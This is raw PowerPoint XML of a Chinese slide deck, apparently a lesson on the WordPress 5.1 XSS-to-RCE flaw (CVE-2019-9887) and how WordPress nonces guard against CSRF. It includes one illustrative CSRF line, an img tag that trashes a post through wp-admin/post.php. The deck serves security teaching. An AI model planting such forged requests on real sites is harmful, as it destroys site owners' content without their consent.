              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一款内容管理系统软件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>），它是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库开发的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 用户可以轻松构建属于自己的网站。根据它的下载量估算，超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>33%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的互联网网站使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/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253253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154C6A-2360-E048-97AF-936385A0C9A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3414" y="306601"/>
            <a:ext cx="7852933" cy="557723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"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总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"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3BD0F8A-7223-6D4F-BDE2-67DD467D28E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10" t="756" r="42434" b="17660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481945" y="1117682"/>
            <a:ext cx="2786187" cy="5766697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862718D3-CDB0-ED43-920B-FCCA38F85DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481946" y="1117682"/>
            <a:ext cx="2786186" cy="5791057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843B4-CE0B-5044-951B-F95D60E3C292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="2841544"/>
            <a:ext cx="3100612" cy="2164123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990F6B-0A9F-F143-99A8-8BF0649910C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="3585051"/>
            <a:ext cx="3100612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WHAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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WE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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  <a:p>
            <a:pPr algn="ctr"/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HAVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>LEARNED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122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4F5D6C5-B877-8C42-9661-2954312D2E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122363"/>
            <a:ext cx="12192000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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5E8D7C7D-874B-3E46-BF54-19B86075F06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026059" y="2709143"/>
            <a:ext cx="681946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kumimoji="1" lang="zh-CN" altLang="en-US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本节课以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1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wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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5.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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为例子，介绍了通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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触发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>的方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform 1669">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789BDFC4-93AC-5B46-AFDD-EF4D65AD18AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4214051" y="2841544"/>
            <a:ext cx="406648" cy="406648"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 519 w 719"/>
              <a:gd name="T1" fmla="*/ 263 h 719"/>
              <a:gd name="T2" fmla="*/ 292 w 719"/>
              <a:gd name="T3" fmla="*/ 475 h 719"/>
              <a:gd name="T4" fmla="*/ 289 w 719"/>
              <a:gd name="T5" fmla="*/ 477 h 719"/>
              <a:gd name="T6" fmla="*/ 284 w 719"/>
              <a:gd name="T7" fmla="*/ 479 h 719"/>
              <a:gd name="T8" fmla="*/ 280 w 719"/>
              <a:gd name="T9" fmla="*/ 477 h 719"/>
              <a:gd name="T10" fmla="*/ 275 w 719"/>
              <a:gd name="T11" fmla="*/ 475 h 719"/>
              <a:gd name="T12" fmla="*/ 200 w 719"/>
              <a:gd name="T13" fmla="*/ 400 h 719"/>
              <a:gd name="T14" fmla="*/ 198 w 719"/>
              <a:gd name="T15" fmla="*/ 396 h 719"/>
              <a:gd name="T16" fmla="*/ 197 w 719"/>
              <a:gd name="T17" fmla="*/ 391 h 719"/>
              <a:gd name="T18" fmla="*/ 198 w 719"/>
              <a:gd name="T19" fmla="*/ 387 h 719"/>
              <a:gd name="T20" fmla="*/ 200 w 719"/>
              <a:gd name="T21" fmla="*/ 382 h 719"/>
              <a:gd name="T22" fmla="*/ 205 w 719"/>
              <a:gd name="T23" fmla="*/ 380 h 719"/>
              <a:gd name="T24" fmla="*/ 209 w 719"/>
              <a:gd name="T25" fmla="*/ 379 h 719"/>
              <a:gd name="T26" fmla="*/ 213 w 719"/>
              <a:gd name="T27" fmla="*/ 380 h 719"/>
              <a:gd name="T28" fmla="*/ 217 w 719"/>
              <a:gd name="T29" fmla="*/ 382 h 719"/>
              <a:gd name="T30" fmla="*/ 284 w 719"/>
              <a:gd name="T31" fmla="*/ 450 h 719"/>
              <a:gd name="T32" fmla="*/ 503 w 719"/>
              <a:gd name="T33" fmla="*/ 247 h 719"/>
              <a:gd name="T34" fmla="*/ 507 w 719"/>
              <a:gd name="T35" fmla="*/ 243 h 719"/>
              <a:gd name="T36" fmla="*/ 512 w 719"/>
              <a:gd name="T37" fmla="*/ 243 h 719"/>
              <a:gd name="T38" fmla="*/ 516 w 719"/>
              <a:gd name="T39" fmla="*/ 243 h 719"/>
              <a:gd name="T40" fmla="*/ 519 w 719"/>
              <a:gd name="T41" fmla="*/ 247 h 719"/>
              <a:gd name="T42" fmla="*/ 522 w 719"/>
              <a:gd name="T43" fmla="*/ 251 h 719"/>
              <a:gd name="T44" fmla="*/ 523 w 719"/>
              <a:gd name="T45" fmla="*/ 255 h 719"/>
              <a:gd name="T46" fmla="*/ 522 w 719"/>
              <a:gd name="T47" fmla="*/ 260 h 719"/>
              <a:gd name="T48" fmla="*/ 519 w 719"/>
              <a:gd name="T49" fmla="*/ 263 h 719"/>
              <a:gd name="T50" fmla="*/ 707 w 719"/>
              <a:gd name="T51" fmla="*/ 0 h 719"/>
              <a:gd name="T52" fmla="*/ 12 w 719"/>
              <a:gd name="T53" fmla="*/ 0 h 719"/>
              <a:gd name="T54" fmla="*/ 8 w 719"/>
              <a:gd name="T55" fmla="*/ 2 h 719"/>
              <a:gd name="T56" fmla="*/ 4 w 719"/>
              <a:gd name="T57" fmla="*/ 5 h 719"/>
              <a:gd name="T58" fmla="*/ 1 w 719"/>
              <a:gd name="T59" fmla="*/ 8 h 719"/>
              <a:gd name="T60" fmla="*/ 0 w 719"/>
              <a:gd name="T61" fmla="*/ 13 h 719"/>
              <a:gd name="T62" fmla="*/ 0 w 719"/>
              <a:gd name="T63" fmla="*/ 707 h 719"/>
              <a:gd name="T64" fmla="*/ 1 w 719"/>
              <a:gd name="T65" fmla="*/ 713 h 719"/>
              <a:gd name="T66" fmla="*/ 4 w 719"/>
              <a:gd name="T67" fmla="*/ 716 h 719"/>
              <a:gd name="T68" fmla="*/ 8 w 719"/>
              <a:gd name="T69" fmla="*/ 719 h 719"/>
              <a:gd name="T70" fmla="*/ 12 w 719"/>
              <a:gd name="T71" fmla="*/ 719 h 719"/>
              <a:gd name="T72" fmla="*/ 707 w 719"/>
              <a:gd name="T73" fmla="*/ 719 h 719"/>
              <a:gd name="T74" fmla="*/ 711 w 719"/>
              <a:gd name="T75" fmla="*/ 719 h 719"/>
              <a:gd name="T76" fmla="*/ 716 w 719"/>
              <a:gd name="T77" fmla="*/ 716 h 719"/>
              <a:gd name="T78" fmla="*/ 718 w 719"/>
              <a:gd name="T79" fmla="*/ 713 h 719"/>
              <a:gd name="T80" fmla="*/ 719 w 719"/>
              <a:gd name="T81" fmla="*/ 707 h 719"/>
              <a:gd name="T82" fmla="*/ 719 w 719"/>
              <a:gd name="T83" fmla="*/ 13 h 719"/>
              <a:gd name="T84" fmla="*/ 718 w 719"/>
              <a:gd name="T85" fmla="*/ 8 h 719"/>
              <a:gd name="T86" fmla="*/ 716 w 719"/>
              <a:gd name="T87" fmla="*/ 5 h 719"/>
              <a:gd name="T88" fmla="*/ 711 w 719"/>
              <a:gd name="T89" fmla="*/ 2 h 719"/>
              <a:gd name="T90" fmla="*/ 707 w 719"/>
              <a:gd name="T91" fmla="*/ 0 h 7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719" h="719">
                <a:moveTo>
                  <a:pt x="519" y="263"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="523" y="255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="263"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="707" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716" y="716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718" y="713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707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Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi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353168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原理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/>
              <a:t>CVE-2019-9887</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/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1B673FC5-5D6E-2243-BBE7-ADC09990266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044700" y="2754000"/>
            <a:ext cx="7940548" cy="1222375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月，一家从事开发静态代码分析软件的公司，公布了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后变更为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，影响了低于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的多个版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WordPress,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>且在默认配置。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞是源于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年的防御机制设计失误。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10510802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原理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-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全机制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1A909D0-0146-6B48-8E98-0C6CF6F69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5335" y="3383552"/>
            <a:ext cx="1270000" cy="127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3C353A2-5451-E743-AB22-C83745909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78520" y="3269488"/>
            <a:ext cx="1270000" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直线箭头连接符 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDA2C4C5-F6B4-CF4C-B098-E580FC06DA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023360" y="3566160"/>
            <a:ext cx="4279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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E2F8AB-3E3B-4747-986B-99729FE505C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023360" y="4248912"/>
            <a:ext cx="42793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D7119E11-416A-5842-BA0C-0874B44D751C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4225328" y="2990827"/>
            <a:ext cx="24673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无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加密散列数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="汇总连接 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46019D0E-2805-5444-9F3A-3EAD8EECE9C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163056" y="3336445"/>
            <a:ext cx="658368" cy="520936"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartSummingJunction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2F1E7364-7C9E-B640-B408-D428D0CA85CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4261475" y="4496989"/>
            <a:ext cx="240963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有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加密散列数据</a:t>
            </a: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0CA92F80-6119-BC48-A51D-04F553F5193B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4547861" y="3755542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/>
              <a:t>评论</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1342620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2D87F023-B1A6-9B4C-86FC-E3E54A3DC31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定义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&amp;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原理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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1E14782-4650-2440-AC41-0CF73AC29A3B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zh-CN"/>
              <a:t>wp-includes/pluggable.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA7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1477" y="1866017"/>
            <a:ext cx="444500" cy="444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A7E1077-C946-5F47-8394-0B5CB7B87F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477" y="2632220"/>
            <a:ext cx="100076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810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CC189912-32E3-1B4A-84DB-33671713B8CF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769872" y="2336292"/>
            <a:ext cx="8205788" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://example.com/wp-admin/post.php?post=123&amp;action=trash</a:t>
            </a:r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6EFC35B-B3DF-4140-A595-9E43B0C0DF4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为什么使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>nonce</a:t>
            </a:r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82C6094-D8FF-4D4E-BA4D-54315FDAD962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107913" y="260185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/>
              <a:t>，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408CAF-050D-B540-9DEA-F9FD2153EFDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769872" y="3530525"/>
            <a:ext cx="86899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ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>&lt;img src="http://example.com/wp-admin/post.php?post=123&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>action=trash" /&gt;</a:t>
            </a:r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39EDB094-3123-4D42-A5FF-78A441577291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1382115" y="4767788"/>
            <a:ext cx="98755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/>
              <a:t>http://example.com/wp-admin/post.php?post=123&amp;action=trash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;_wpnonce=b192fc4204</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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66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91958FE-6DDC-B746-A93D-80E7BA673B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4455814"/>
            <a:ext cx="8205788" cy="369332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./wp-includes/pluggable.php</a:t>
            </a:r>
          </a:p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82E7C2-5548-1A43-A509-A8AD5C105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漏洞根源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E93898-1511-C846-80FA-1A16A72394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78156"/>
            <a:ext cx="10947400" cy="26416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EC691CC-1D49-1C4B-BC22-F9C990E740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940814"/>
            <a:ext cx="12192000" cy="139962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BD09E08-7709-D84E-956A-A062CFE679A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1167591"/>
            <a:ext cx="28344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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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/wp-admin/edit.php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3064B1F5-F218-7746-94B1-D846259E1178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310896" y="2432304"/>
            <a:ext cx="4974336" cy="3291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1B1EEDDA-FFB2-764C-ADE1-F1AF3B7BE0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135200" y="6017190"/>
            <a:ext cx="4974336" cy="3291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393266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491958FE-6DDC-B746-A93D-80E7BA673BD5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0" y="1117229"/>
            <a:ext cx="8205788" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>./wp-includes/pluggable.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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682E7C2-5548-1A43-A509-A8AD5C1054F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/>
              <a:t>漏洞根源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E81011-9CA0-1A48-B256-A69554E7B8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2784790"/>
            <a:ext cx="11544300" cy="26416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801F1DD-6345-9E43-892A-3F480B2946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0" y="1898857"/>
            <a:ext cx="6642100" cy="774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65154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10156</TotalTime>
  <Words>2049</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>178</Paragraphs>
  <Slides>30</Slides>
  <Notes>28</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="8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等线 Light</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi</vt:lpstr>
      <vt:lpstr>Alibaba PuHuiTi Medium</vt:lpstr>
      <vt:lpstr>Microsoft YaHei UI</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
